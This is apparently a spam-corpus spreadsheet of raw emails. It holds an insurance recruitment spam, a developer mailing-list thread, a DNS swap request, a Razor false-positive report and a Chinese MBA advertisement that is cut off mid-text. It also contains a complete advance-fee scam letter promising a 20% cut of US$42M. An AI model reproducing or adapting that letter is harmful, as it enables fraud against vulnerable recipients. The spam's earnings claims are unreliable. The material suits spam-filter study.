 O=c=O O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn 20 times your peers
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_529F67_01C20BE4.AE80C980
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
 Asset Marketing Systems
 is the insurance industry's fastest growing Field Marketing Organization
 over the past four years. This year we'll place $1.5 billion in premium,
 selling high-quality, high-commission fixed annuities to America's 35
 million Senior Citizens.
 Why have so many Agents chosen to do business with Asset Marketing
 Systems?
 Asset Marketing is the only FMO in America that generates qualified
 leads, helps set appointments, structures product positioning, increases
 closing ratios and handles all the paperwork... at absolutely no cost to
 the Agent!
 We are also proud to report our Agents routinely earn 20 times the
 industry average. Assuming you qualify, we'll pick up the entire tab for
 you to visit our corporate offices in sunny San Diego.
  One phone call can change your life. Guaranteed.	
 Ready to join the Best? Call Susan at
  888-303-8755
 or e-mail Jennifer at jennifer@assetmarketingsystems.com
 &lt;mailto:jennifer@assetmarketingsystems.com&gt; 
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 Asset Marketing Systems &lt;http://www.assetmarketingsystems.com&gt; 
 We do not want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net 	
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;  
 ------=_NextPart_000_529F67_01C20BE4.AE80C980
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Earn 20 times your peers&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" border=3D"1" bgcolor=3D"#ffffff" =
 bordercolor=3D"#000000"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"0" =
 border=3D"0" =
 background=3D"http://iiq.us/images/assetmktg/20020508-1a.jpg"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/assetmktg/spacer.gif" width=3D"169" =
 height=3D"222"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"47%" valign=3D"top"&gt;
                   &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"3" color=3D"#000066"&gt;
                   Asset Marketing Systems&lt;br&gt;
                   &lt;font color=3D"#000000" size=3D"2"&gt;is the insurance =
 industry's fastest=20
                   growing Field Marketing Organization over the past =
 four years.=20
                   This year we'll place $1.5 billion in premium, selling =
 high-quality,=20
                   high-commission fixed annuities to America's 35 =
 million Senior=20
                   Citizens.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;br&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"53%" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/assetmktg/spacer.gif" width=3D"169" =
 height=3D"344"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#000000"&gt;
             &lt;br&gt;&lt;font size=3D"3" color=3D"#000066"&gt;&lt;i&gt;
             Why have so many Agents chosen to do business with Asset =
 Marketing=20
             Systems?&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
             Asset Marketing is the only FMO in America that
             generates qualified leads, helps set appointments, =
 structures=20
             product positioning, increases closing ratios and handles =
 all the=20
             paperwork... at absolutely no cost to the Agent!&lt;br&gt;
             &lt;br&gt;
             We are also proud to report &lt;font size=3D"3" =
 color=3D"#000066"&gt;
             our Agents routinely earn 20 times the industry average. =
 &lt;/font&gt;Assuming=20
             you qualify, we'll pick up the entire tab for you to visit =
 our corporate=20
             offices in sunny San Diego.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/assetmktg/20020417-3.gif" width=3D"540" =
 height=3D"66" alt=3D"One phone call can change your life. =
 Guaranteed."&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;br&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Ready to join the Best? Call Susan at&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/assetmktg/20020417-4.jpg" =
 width=3D"535" height=3D"84" alt=3D"888-303-8755"&gt;&lt;br&gt;
             or e-mail Jennifer at &lt;a =
 href=3D"mailto:jennifer@assetmarketingsystems.com"&gt;jennifer@assetmarketin=
 gsystems.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;
             &lt;/b&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr bgcolor=3D"#000033"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;b&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;b&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;b&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jennifer@assetmarketingsystems.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"AMS's IQ Ad Inquiry"&gt;
                           &lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;br&gt;
             &lt;a href=3D"http://www.assetmarketingsystems.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/assetmktg/20020417-5.gif" width=3D"493" =
 height=3D"68" border=3D"0" alt=3D"Asset Marketing Systems"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;nbsp; &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font size=3D"1" face=3D"Arial, =
 Helvetica, sans-serif"&gt;We=20
             do not want anyone to receive our mailings who does not wish =
 to. This=20
             is professional communication sent to insurance =
 professionals. To=20
             be removed from this mailing list, DO NOT REPLY to this =
 message. Instead,=20
             go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.Insurancemail.net&lt;/a&gt;&lt;/f=
 ont&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif" color=3D"#99CCFF"&gt;Legal =
 Notice&lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_529F67_01C20BE4.AE80C980--
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR SIR/MADAM
 RE: BUSINESS ASSISTANCE
 I have decided to contact your assistance in relation to the following business proposal, having obtained your contact through the commercial attach of your country's embassy in South Africa. This recommendation is based on the information that you will not betray the trust and confidence to be reposed in you. I am Romila Kabila the second son of the assassinated former President Of Democratic Republic Of Congo (D.C) Late Laurent Desire Kabila who on Tuesday 16 January   during the four years rule of my father I was his confidential/private security and base on my position of relationship of father and son. I was able to be in change of the president's personal security vault and some of his savings.
 Now following the death of my father, the immediate family of the late President Kabila has met and concluded that some savings and security vault of the former President should be moved out of the troubled Democratic Republic of Congo with immediate president of Democratic republic of Congo by the late Kabila has been appointed president of democratic republic of Congo by the late kabila's national executive council and the country top military brass, and properties worth millions of US$ to relocate the late president kabila's assets and properties with millions of dollars  to over sea country where there is good political climate. We have concluded arrangement to move/transfer the sum US$42M to a finance and security company in London through a Diplomatic courier services. The family through a diplomatic contact during my father's regime, conclude an arrangement to lodge/deposit the above sums with the GLOBAL DIPLOMATIC AND SECURITY SERVICES in LONDON - U.K!
 . And it is on this, that I am soliciting for your assistance to help us receive this amount from this security company once it arrives London upon your acceptance to assist in this project as we the family member can not do it on our own because of the code of conduct, which was introduced by my late father to checkmate excess embezzlement/siphoning of the Government/public funds overseas country as the case had be during the Late President Mobutu Sese Seko. So one cannot make law and destroy the same law. Therefore if you can render your assistance, please indicate your interest to me through my email romkabila@presidency.com, you should then urgently arrange to travel to London and clear the (consignments) funds upon it arrival and subsequent payment of the US$42M into your bank account. As soon as we hear from you, we then send a representative to be with you in London to represent our interest. Based on your anticipated efforts and contri!
 bution the family has resolved to give you 20% commission and the remaining 80% will be reclaimed by the family. It will be my pleasure to be able to co-operate with you on terms that you may wish for the successful completion of this project. 
 Thanks and remain blessed.
 Best Regards,
 ROMILA KABILA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tiny DNS Swap
</t>
  </si>
  <si>
    <t xml:space="preserve">(This list is sponsored by Ironclad Networks http://www.ironclad.net.au/)
 This is a multi-part message in MIME format.
 ------=_NextPart_000_00C1_01C25017.F2F04E20
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
 I'm using Simple DNS from JHSoft.  We support only a few web sites and =
 I'd like to swap secondary services with someone in a similar position.
 We have a static IP, DSL line and a 24/7 set of web, SQL, mail and now a =
 DNS server.  As I said, we are hosting about 10 web sites, web and DNS =
 traffic is almost nothing.  Everything is on lightly loaded APC battery =
 backups so we are very seldom down.
 I'd like to swap with someone also using Simple DNS to take advantage of =
 the trusted zone file transfer option.
 Bob Musser
 Database Services, Inc.
 Makers of:
    Process Server's Toolbox
    Courier Service Toolbox
 BobM@dbsinfo.com
 www.dbsinfo.com
 106 Longhorn Road
 Winter Park FL 32792
 (407) 679-1539
 ------=_NextPart_000_00C1_01C25017.F2F04E20
 Content-Type: text/html;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Dwindows-1252"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;I'm using Simple DNS from JHSoft.&amp;nbsp; We support =
 only a few=20
 web sites and I'd like to swap secondary services with someone in a =
 similar=20
 position.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;We have a static IP, DSL line and a 24/7 set of web, =
 SQL, mail=20
 and now a DNS server.&amp;nbsp; As I said, we are hosting about 10 web =
 sites, web=20
 and DNS traffic is almost nothing.&amp;nbsp; Everything is on lightly loaded =
 APC=20
 battery backups so we are very seldom down.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;I'd like to swap with someone also using Simple DNS =
 to take=20
 advantage of the trusted zone file transfer option.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;Bob Musser&lt;BR&gt;Database Services, Inc.&lt;BR&gt;Makers=20
 of:&lt;BR&gt;&amp;nbsp;&amp;nbsp; Process Server's Toolbox&lt;BR&gt;&amp;nbsp;&amp;nbsp; Courier =
 Service=20
 Toolbox&lt;BR&gt;&lt;A =
 href=3D"mailto:BobM@dbsinfo.com"&gt;BobM@dbsinfo.com&lt;/A&gt;&lt;BR&gt;&lt;A=20
 href=3D"http://www.dbsinfo.com"&gt;www.dbsinfo.com&lt;/A&gt;&lt;BR&gt;106 Longhorn =
 Road&lt;BR&gt;Winter=20
 Park FL 32792&lt;BR&gt;(407) 679-1539&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_00C1_01C25017.F2F04E20--
 --
 To Unsubscribe: &lt;dns-swap-off@lists.ironclad.net.au&gt;
 Sponsor &amp; Host: Ironclad Networks &lt;http://www.ironclad.net.au/&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] false-positive found
</t>
  </si>
  <si>
    <t xml:space="preserve">Razor v1 just called a post to the mutt-users mailing list SPAM
 with the following signature.
         b230a8ed84eb262bed1f2c908703990d3483b55f
 BTW, is there are another way for us folks still using v1 to
 revoke false-positives such as this without posting to the list?
 Thanks.
 -steve
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_592622610P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; Date:  Thu, 22 Aug 2002 23:14:20 +0200
 &gt;
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; On Thu, 22 Aug 2002, "Chris" == Chris Garrigues wrote:
 &gt; 
 &gt;   Chris&gt; --==_Exmh_267413022P Content-Type: text/plain;
 &gt;   Chris&gt; charset=us-ascii
 &gt; 
 &gt;   +&gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt; Date:  Thu, 22 Aug
 &gt;   +&gt; 2002 20:23:17 +0200
 &gt; 
 &gt;   +&gt; Oooops!
 &gt; 
 &gt;   +&gt; Doesn't work at all. Got this on startup and on any attempt to
 &gt;   +&gt; change folde r (which fail)
 &gt; 
 &gt;   Chris&gt; ~sigh~ I'd already found that and checked it in....apparently
 &gt;   Chris&gt; I did so after you checked it out and before you sent this
 &gt;   Chris&gt; mail...I hoped I was fast enough that you wouldn't see it.
 &gt; 
 &gt;   Chris&gt; Try again!
 &gt; 
 &gt; 
 &gt; Works like a charm. It's like the box was on drugs or something. 
 &gt; 
 &gt; However, while testing it a selected my favourite folder (l-k) and 
 &gt; marked ~400 messages unread. THAT took forever, or about as long as 
 &gt; Catch-up Unseen did before. Any suggestions?
 That's fixed now.  I thought I'd caught all the occurrences of that particular 
 coding stupidity.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_592622610P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZV2CK9b4h5R0IUIRAnWSAJwLZJvK8S4LQRv57W3WIbG9U2P+ywCdExEL
 kJaVNhuHKW9tp29wID5EjbU=
 =HDIb
 -----END PGP SIGNATURE-----
 --==_Exmh_592622610P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?gb2312?q?=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5MBA_?=
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --d51589f6-64c8-11d6-b6fa-0050ba415022
 Content-Type: text/plain; charset=gb2312
 Content-Transfer-Encoding: quoted-printable
                       WUT  =C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5   MBA
                     =B9=A4=C9=CC=B9=DC=C0=ED=CB=B6=CA=BF=D1=D0=BE=BF=C9=FA=BF=
 =CE=B3=CC=D1=D0=D0=DE=B0=E0
                          =D5=D0    =C9=FA    =BC=F2    =D5=C2
          =D0=D0=D2=B5=C8=A8=CD=FE=B4=F3=D1=A7=D6=F7=B0=EC  =C5=E0=D1=F8=D0=D0=
 =D2=B5=B8=DF=BC=B6=B9=DC=C0=ED=C8=CB=B2=C5   =D6=FD=BE=CD=CD=C5=CC=E5=BA=CF=D7=
 =F7=BE=AB=C9=F1
                   =B2=A9=B5=BC=B9=E3=D6=DD=C1=EC=CF=CE=CA=DA=BF=CE   =CC=E1=B9=
 =A9=C6=F3=D2=B5=B9=CB=CE=CA=B7=FE=CE=F1
                   =B9=FA=C4=DA=CD=E2MBA=C8=C8=C3=C5=BF=CE=B3=CC   =B9=FA=BC=CA=
 =C1=F7=D0=D0=BD=CC=D1=A7=C4=A3=CA=BD
              =B6=E0=C3=BD=CC=E5=BD=CC=D1=A7 =CB=AB=D3=EF=BD=CC=D1=A7 =B0=B8=C0=
 =FD=B7=D6=CE=F6  =B1=E7=C2=DB=C8=FC  =C3=FB=BC=D2=BD=B2=D7=F9
    =CE=AA=CC=E1=B8=DF=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=B8=F7=B2=E3=B4=
 =CE=A1=A2=B8=F7=B8=DA=CE=BB=C6=F3=D2=B5=D6=F7=B9=DC=B5=C4=B9=DC=C0=ED=CB=AE=C6=
 =BD=A3=AC=B4=AB=B2=A5=B9=FA=BC=CA=D7=EE=CF=C8=BD=F8=B5=C4=BE=AD=D3=AA=B9=DC=C0=
 =ED=C4=A3=CA=BD=A3=AC=C5=E0=D1=F8=CA=EC=C1=B7=D5=C6=CE=D5=CA=D0=B3=A1=BE=AD=BC=
 =C3=A3=AC=B4=D3=C8=DD=D3=A6=B6=D4=CE=B4=C0=B4=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=
 =D0=D2=B5=B9=FA=BC=CA=BE=BA=D5=F9=B5=C4=B8=DF=BC=B6=BE=AD=D3=AA=B9=DC=C0=ED=C8=
 =CB=B2=C5=A3=AC=B4=EE=C6=F0=BD=CC=CA=DA=D3=EB=C6=F3=D2=B5=D6=AE=BC=E4=D0=D0=D2=
 =B5=B9=CB=CE=CA=D0=D4=C7=C5=C1=BA=A3=AC=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=
 =A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=
 =F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=
 =A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=
 =A9=BE=F6=B6=A8=BE=D9=B0=EC=B8=DF=BC=B6=D1=D0=D0=DE=B0=E0=A1=A3
 1=A1=A2=BC=F2=BD=E9
 =CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=
 =D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=
 =D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=
 =BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=CA=C7=C8=AB=B9=FA=C9=D9=CA=FD=BC=B8=
 =BC=D2=D3=B5=D3=D0=B9=A4=B3=CC=B9=DC=C0=ED=D4=BA=CA=BF=B5=C4=B9=DC=C0=ED=D1=A7=
 =D4=BA=D6=AE=D2=BB=A1=A3=B9=DC=C0=ED=D1=A7=D4=BA=CF=D6=D3=D0=BD=CC=CA=A6147=C8=
 =CB=A3=AC=C6=E4=D6=D0=B2=A9=CA=BF=C9=FA=B5=BC=CA=A612=C8=CB=A3=AC=BD=CC=CA=DA=
 28=C8=CB=A3=AC=B8=B1=BD=CC=CA=DA56=C8=CB=A3=AC=D3=D05=B8=F6=CB=B6=CA=BF=B5=E3=
 =BA=CD1=B8=F6MBA=CA=DA=C8=A8=B5=E3=A1=A3=B2=A2=D3=B5=D3=D0=B9=DC=C0=ED=BF=C6=
 =D1=A7=D3=EB=B9=A4=B3=CC=B2=A9=CA=BF=B5=E3=BA=CD=B9=DC=C0=ED=BF=C6=D1=A7=D3=EB=
 =B9=A4=B3=CC=B2=A9=CA=BF=BA=F3=C1=F7=B6=AF=D5=BE=A1=A3
 2=A1=A2=C8=EB=D1=A7=CC=F5=BC=FE=A3=BA
 =A1=F4=B4=F3=D1=A7=D2=D4=C9=CF=D1=A7=C0=FA=A3=BB         =A1=F4=C8=FD=C4=EA=D2=
 =D4=C9=CF=B9=A4=D7=F7=BE=AD=D1=E9=A3=BB     =A1=F4=D3=D0=D2=BB=B6=A8=B5=C4=C6=
 =F3=D2=B5=B9=DC=C0=ED=D6=AA=CA=B6=A3=BB
 3=A1=A2=D1=A7=CF=B0=B7=BD=CA=BD=A3=BA
 =A1=F4=BC=AF=D6=D0=C3=E6=CA=DA=D3=EB=D2=B5=D3=E0=D1=A7=CF=B0=CF=E0=BD=E1=BA=CF=
 =A3=AC=D6=DC=C1=F9=A1=A2=D6=DC=C8=D5=BC=AF=D6=D0=C9=CF=BF=CE=A3=BB
 =A1=F4=CA=B5=D0=D0=D1=A7=B7=D6=D6=C6=A3=AC=D1=A7=D4=B1=BF=C9=D7=D4=D1=A1=D4=F1=
 =D1=A7=CF=B0=CA=B1=BC=E4=D3=EB=B5=D8=B5=E3=A3=BB
 =A1=F4=BF=CE=B3=CC=D1=A7=CF=B0=CE=AA=D2=BB=C4=EA=B0=EB=A1=A3
 4=A1=A2=CA=A6=D7=CA=C5=E4=B1=B8=A3=BA
 =A1=F4=D3=C9=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=
 =B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=
 =B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=
 =CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=B2=A9=CA=BF=C9=FA=B5=BC=
 =CA=A6=A3=AC=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=B9=FA=BC=CA=D6=AA=C3=FB=
 =D1=A7=D5=DF=C1=AA=BA=CF=D6=F7=BD=B2=A1=A3=C8=B7=B1=A3=BD=CC=D1=A7=D6=CA=C1=BF=
 =B4=EF=B5=BD=D0=D0=D2=B5=B5=DA=D2=BB=A1=A3
 5=A1=A2MBA=BF=BC=C7=B0=B8=A8=B5=BC=A3=BA
 =CA=B1=BC=E4=A3=BA =A3=A81=A3=A9 MBA=B5=A5=D6=A4=BF=BC=C7=B0=B8=A8=B5=BC=B0=E0=
 =A3=BA=C3=BF=C4=EA7=D4=C2=B7=DD=A1=A29=D4=C2=B7=DD=BC=AF=D6=D0=B8=A8=B5=BC2=B4=
 =CE=A1=A3
 =A3=A82=A3=A9MBA=CB=AB=D6=A4=BF=BC=C7=B0=B8=A8=B5=BC=B0=E0=A3=BA=C3=BF=C4=EA=
 9=D4=C2=D6=C1=BF=BC=C7=B0=A1=A3
 6=A1=A2=D6=A4=CA=E9=A3=BA
 =A1=F4=D0=DE=CD=EA=CB=F9=D3=D0=BF=CE=B3=CC=A3=AC=B3=C9=BC=A8=BA=CF=B8=F1=A3=AC=
 =BB=F1=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=
 =B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=
 =B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=
 =BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=D0=A3=B3=A4=C7=A9=C3=FB=A1=A2=
